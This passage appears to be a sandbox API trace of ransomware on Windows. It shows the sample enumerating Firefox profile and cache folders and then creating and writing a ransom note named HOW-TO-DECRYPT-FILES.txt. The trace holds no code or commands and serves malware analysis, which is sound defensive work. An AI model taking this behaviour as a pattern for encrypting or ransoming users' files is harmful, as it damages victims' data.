lpFilePart=0x0) returned 0x2d [0049.187] GetLastError () returned 0x5 [0049.187] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla", lpFilePart=0x0) returned 0x26 [0049.187] GetLastError () returned 0x5 [0049.187] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.187] GetLastError () returned 0x5 [0049.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.187] GetLastError () returned 0x5 [0049.187] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla", lpFilePart=0x0) returned 0x26 [0049.187] GetLastError () returned 0x5 [0049.187] SetErrorMode (uMode=0x1) returned 0x0 [0049.187] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.187] GetLastError () returned 0x5 [0049.187] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.187] GetLastError () returned 0x5 [0049.187] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.188] GetLastError () returned 0x5 [0049.188] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.188] GetLastError () returned 0x5 [0049.188] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.188] GetLastError () returned 0x12 [0049.188] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.188] SetErrorMode (uMode=0x0) returned 0x1 [0049.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla", lpFilePart=0x0) returned 0x26 [0049.188] GetLastError () returned 0x12 [0049.188] SetErrorMode (uMode=0x1) returned 0x0 [0049.188] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.188] GetLastError () returned 0x12 [0049.188] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.188] GetLastError () returned 0x12 [0049.188] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.188] GetLastError () returned 0x12 [0049.188] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.188] GetLastError () returned 0x12 [0049.188] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.188] GetLastError () returned 0x12 [0049.188] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.188] SetErrorMode (uMode=0x0) returned 0x1 [0049.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x18e8bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x2e [0049.188] GetLastError () returned 0x12 [0049.188] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.188] GetLastError () returned 0x12 [0049.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.188] GetLastError () returned 0x12 [0049.188] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x2e [0049.188] GetLastError () returned 0x12 [0049.188] SetErrorMode (uMode=0x1) returned 0x0 [0049.188] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.189] GetLastError () returned 0x12 [0049.189] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.189] GetLastError () returned 0x12 [0049.189] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.189] GetLastError () returned 0x12 [0049.189] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.189] GetLastError () returned 0x12 [0049.189] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.189] SetErrorMode (uMode=0x0) returned 0x1 [0049.189] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox", nBufferLength=0x105, lpBuffer=0x18e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox", lpFilePart=0x0) returned 0x2e [0049.189] GetLastError () returned 0x12 [0049.189] SetErrorMode (uMode=0x1) returned 0x0 [0049.189] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.189] GetLastError () returned 0x12 [0049.189] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.189] GetLastError () returned 0x12 [0049.189] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.189] GetLastError () returned 0x12 [0049.189] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.189] GetLastError () returned 0x12 [0049.189] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.189] SetErrorMode (uMode=0x0) returned 0x1 [0049.189] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x18e850, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x37 [0049.189] GetLastError () returned 0x12 [0049.189] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.190] GetLastError () returned 0x12 [0049.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e774, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.190] GetLastError () returned 0x12 [0049.190] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x37 [0049.190] GetLastError () returned 0x12 [0049.190] SetErrorMode (uMode=0x1) returned 0x0 [0049.190] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.190] GetLastError () returned 0x12 [0049.190] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.190] GetLastError () returned 0x12 [0049.190] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.190] GetLastError () returned 0x12 [0049.190] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.190] GetLastError () returned 0x12 [0049.190] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.191] SetErrorMode (uMode=0x0) returned 0x1 [0049.191] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles", nBufferLength=0x105, lpBuffer=0x18e728, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles", lpFilePart=0x0) returned 0x37 [0049.191] GetLastError () returned 0x12 [0049.191] SetErrorMode (uMode=0x1) returned 0x0 [0049.191] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.191] GetLastError () returned 0x12 [0049.191] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.191] GetLastError () returned 0x12 [0049.191] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.191] GetLastError () returned 0x12 [0049.191] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.191] GetLastError () returned 0x12 [0049.191] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.191] SetErrorMode (uMode=0x0) returned 0x1 [0049.191] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default", nBufferLength=0x105, lpBuffer=0x18e7e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default", lpFilePart=0x0) returned 0x48 [0049.191] GetLastError () returned 0x12 [0049.191] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.191] GetLastError () returned 0x12 [0049.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e708, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.191] GetLastError () returned 0x12 [0049.191] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default", lpFilePart=0x0) returned 0x48 [0049.191] GetLastError () returned 0x12 [0049.191] SetErrorMode (uMode=0x1) returned 0x0 [0049.191] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.202] GetLastError () returned 0x12 [0049.202] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.202] GetLastError () returned 0x12 [0049.202] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.203] SetErrorMode (uMode=0x0) returned 0x1 [0049.203] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default", nBufferLength=0x105, lpBuffer=0x18e6bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default", lpFilePart=0x0) returned 0x48 [0049.203] GetLastError () returned 0x12 [0049.203] SetErrorMode (uMode=0x1) returned 0x0 [0049.203] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.204] GetLastError () returned 0x12 [0049.204] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.204] GetLastError () returned 0x12 [0049.204] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.205] SetErrorMode (uMode=0x0) returned 0x1 [0049.205] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\_CACHE_CLEAN_", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\_CACHE_CLEAN_", lpFilePart=0x0) returned 0x56 [0049.205] GetLastError () returned 0x12 [0049.205] SetErrorMode (uMode=0x1) returned 0x0 [0049.205] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\_CACHE_CLEAN_" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\_cache_clean_"), fInfoLevelId=0x0, lpFileInformation=0x1c40770 | out: lpFileInformation=0x1c40770*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86c139a0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86c139a0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xea0cd2b0, ftLastWriteTime.dwHighDateTime=0x1d2fb2e, nFileSizeHigh=0x0, nFileSizeLow=0x1)) returned 1 [0049.208] GetLastError () returned 0x12 [0049.208] SetErrorMode (uMode=0x0) returned 0x1 [0049.208] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x61 [0049.208] GetLastError () returned 0x12 [0049.208] SetErrorMode (uMode=0x1) returned 0x0 [0049.208] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\local\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0049.208] GetLastError () returned 0x0 [0049.208] GetFileType (hFile=0x184) returned 0x1 [0049.208] SetErrorMode (uMode=0x0) returned 0x1 [0049.208] GetFileType (hFile=0x184) returned 0x1 [0049.208] WriteFile (in: hFile=0x184, lpBuffer=0x1c5c62c*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18eb7c, lpOverlapped=0x0 | out: lpBuffer=0x1c5c62c*, lpNumberOfBytesWritten=0x18eb7c*=0x18da, lpOverlapped=0x0) returned 1 [0049.209] GetLastError () returned 0x0 [0049.209] CloseHandle (hObject=0x184) returned 1 [0049.209] GetLastError () returned 0x0 [0049.209] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e744, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x61 [0049.209] GetLastError () returned 0x0 [0049.210] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0049.210] GetLastError () returned 0x0 [0049.210] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache", nBufferLength=0x105, lpBuffer=0x18e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache", lpFilePart=0x0) returned 0x4e [0049.210] GetLastError () returned 0x0 [0049.210] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0049.210] GetLastError () returned 0x0 [0049.210] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e69c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0049.210] GetLastError () returned 0x0 [0049.210] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache", lpFilePart=0x0) returned 0x4e [0049.210] GetLastError () returned 0x0 [0049.210] SetErrorMode (uMode=0x1) returned 0x0 [0049.210] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.221] GetLastError () returned 0x0 [0049.221] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.221] GetLastError () returned 0x0 [0049.221] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.221] GetLastError () returned 0x0 [0049.221] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.221] GetLastError () returned 0x0 [0049.221] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.221] GetLastError () returned 0x0 [0049.221] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.221] GetLastError () returned 0x0 [0049.221] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.222] GetLastError () returned 0x0 [0049.222] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.222] GetLastError () returned 0x12 [0049.222] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.223] SetErrorMode (uMode=0x0) returned 0x1 [0049.223] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache", nBufferLength=0x105, lpBuffer=0x18e650, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache", lpFilePart=0x0) returned 0x4e [0049.223] GetLastError () returned 0x12 [0049.223] SetErrorMode (uMode=0x1) returned 0x0 [0049.223] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360f60 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.224] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.224] GetLastError () returned 0x12 [0049.225] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.225] GetLastError () returned 0x12 [0049.225] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0049.225] GetLastError () returned 0x12 [0049.225] FindNextFileW (in: hFindFile=0x360f60, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0049.225] GetLastError () returned 0x12 [0049.225] FindClose (in: hFindFile=0x360f60 | out: hFindFile=0x360f60) returned 1 [0049.225] SetErrorMode (uMode=0x0) returned 0x1 [0049.225] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Cache\\_CACHE_001_", nBufferLength=0x105, lpBuffer=0x18e704, lpFilePart=0x0 | out: 